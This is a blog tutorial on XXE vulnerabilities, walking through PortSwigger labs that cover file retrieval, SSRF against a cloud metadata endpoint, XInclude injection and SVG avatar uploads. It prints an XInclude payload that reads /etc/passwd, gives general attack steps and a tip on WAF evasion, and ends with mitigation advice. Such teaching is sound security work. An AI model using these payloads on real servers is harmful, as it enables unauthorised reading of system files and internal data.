Understanding XXE Vulnerabilities

Scott Cosentino
8 min readMar 17, 2020

This article will explain to you the fundamentals of XXE vulnerabilities. When a server parses XML data provided by a user, there is a risk of XXE vulnerabilities. These vulnerabilities typically leverage external entities to expose sensitive information stored on the server. This is possible due to a feature known as XML external entities. These are a type of custom XML entity that can load values from outside of the document they are defined in. This means that an attacker can declare a path to a file or a URL, and the server will attempt to retrieve this data. This in turn allows the attacker to expose the contents of the targeted file or URL.

In this article, we will look at four XXE based attacks:

1. XXE through form posts to retrieve files

2. XXE through form posts to perform SSRF attacks

3. XXE through the XInclude tag

4. XXE through SVG file upload

To demonstrate these types of attacks, I am going to be using the labs available at https://portswigger.net/web-security/xxe. These labs are free to access after registering for an account. I will also be leveraging the Burp Suite tool from portswigger to help demonstrate packet tampering. The video at the beginning of the article will show a visual walkthrough of these labs, so it is helpful if you want to see a visual step by step guide.

XXE To Retrieve Files

To start, we will look at using XXE to expose the /etc/passwd file from a target server. When we access the lab webpage, we will see several items that we can view the details of.

If we enter any item, there is an area where we can check the stock of the item at a given store. If we use Burp Suite to intercept the packets, we will see that the stock request is sent in XML format.

If we move this packet to the repeater using Action->Send To Repeater, we can experiment with this packet to try different inputs to find one that works. The format of the XML is easily seen through the XML tab on the packet.

From here, we can modify the XML data to add in an XXE to request the file we wish to target. First, I will show what the modified input works, and then explain how and why it works.

The content on line 2 is where we define the external entity that we want to reference. In this line, xxe is the name of the variable that stores the external entity. We want a system resource, which we provide the path to as a file. Once this is defined, we replace the productid parameter with the external entity we declared. From here, we can send the request, and we will get the following results.

What happens is the XML file replaces the previous productid with the contents of the external entity, which is the /etc/passwd file. It then queries the server for the product ID equal to the contents of the /etc/passwd file. Since this isn’t a valid product ID, it returns an error message. The error message states that the product ID was invalid and dumps the product ID it was attempting to use. Since the product ID was the contents of the /etc/passwd file, the contents of the file are dumped to the screen.

The structure of XXE based attacks will typically follow this exact format, with some simple variations to fit the scenario. The general steps to successfully conduct a XXE attack are:

1. Determine the XML data being sent to the server

2. Determine what parameter is being parsed by the server

3. Define an external entity pointing to a target file or URL

4. Set the parameter being parsed by the server equal to the external entity

XXE to perform SSRF attacks

A SSRF attack allows an attacker to perform server-side request forgery. This basically means that the attacker can make HTTP requests to any URL the server can access. This means that they can access URLs that they typically don’t have permission to access, which could potentially leak data.

Looking at the same example as previous, when we send XML to get the store stock, instead of specifying files to retrieve, we can specify URLs instead. The request would look as follows.

Really the only thing that changes in the request is that we specify a URL instead of a file on the system. When the URL request is returned, we will see that it shows little information.

What this reveals to us is the next path in the URL, so we can now try querying http://169.254.169.254/latest

We can continue to repeat this until we reach the security data stored on the server.

Doing this will reveal the content of the URL.

From this, we can see that XXE attacks enable us to not only expose files, but also server accessible URLs. This means that almost all data accessible to the server is at risk of compromise if XXE vulnerabilities are present. Given that this is the case, it is important to understand a few more obscure ways to create XXE attack conditions.

XXE through the XInclude tag

Often, an attacker does not have full control over the XML data, but has control over an input passed into the data. In these cases, they can’t inject an entity before the XML parameters, which makes it appear impossible to conduct XXE attacks. Often however, it is possible to do a XXE attack with just access to a single parameter, using the XInclude feature of XML.

XInclude can be thought of as a way of including another XML document within an existing one. Using this feature, we can include a XML component that defines our external entity, and use that to leak data from the server. In this situation, the data sent from the client includes only the parameters required to add to the XML.

To setup the XInclude, we need to inject data into the product ID parameter. The payload will look like below.

Without all of the encoding, the payload is:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

We start by showing the XML parser that we are defining an XInclude. From here, we setup the include using xi:include, providing it text. The text is a href that points to the file or URL that we wish to pull information from. Upon running this, the product ID is given the XInclude, which resolves to the /etc/passwd file. Like before, it attempts to resolve the file, use it as a product ID, and returns an error saying the product ID is not valid. In the error, the contents of the file are displayed.

Exploiting XXE using SVG Files

It’s important to note that not all XXE attacks rely on basic XML. XXE can also be found in XML based file formats, such as SVG files. In this example, we will take a look at how we can leak data from a file using a SVG file.

In this example, we have a blog where we can post comments, and upload our own avatar to go with our comment. The avatar can be any file format, including SVG files.

SVG files are formatted and often parsed in the same way as a regular XML file. Due to this, we can add XXE code in the same way that we can in any other XML based packet. The following SVG file can print the contents of the /etc/hostname file to the avatar image.

We start off very similar to the other XXE examples, however the way we get the contents of the file to output is different. Lines 3 and 4 are standard for most SVG files, and line 5 is where we actually print the content. On this line, we specify a text element, with a font size as well as location. For the contents of the file, as put the xxe variable, which stores the contents of the external entity /etc/hostname. When we upload this file, the resulting image has text that contains the contents of the /etc/hostname file.

This demonstrates an example where we can manage a XXE attack without using a traditional XXE file or payload. File types like SVG and any others that use XML format can be vulnerable to this type of attack, so it is important to ensure they are parsed safely.

Mitigating XXE Attacks

Often administrators will attempt to use WAFs to prevent XXE, however they are typically quite easy to bypass. Using encoding like UTF-32 with encryption can typically lower a WAFs visibility of the traffic, meaning you can slip by a payload without being spotted. In addition to this, WAFs tend to have performance implications, so using one may not be optimal for your application.

Disabling custom document definitions (DTD) if they aren’t required is typically the preferred solution to prevent XXE attacks. Every language has a different way to do this, so you would need to do some research to determine how to disable the setting in your respective parser/language.

With this article, you should now have the knowledge to test and locate XXE vulnerabilities in your web applications.

--

--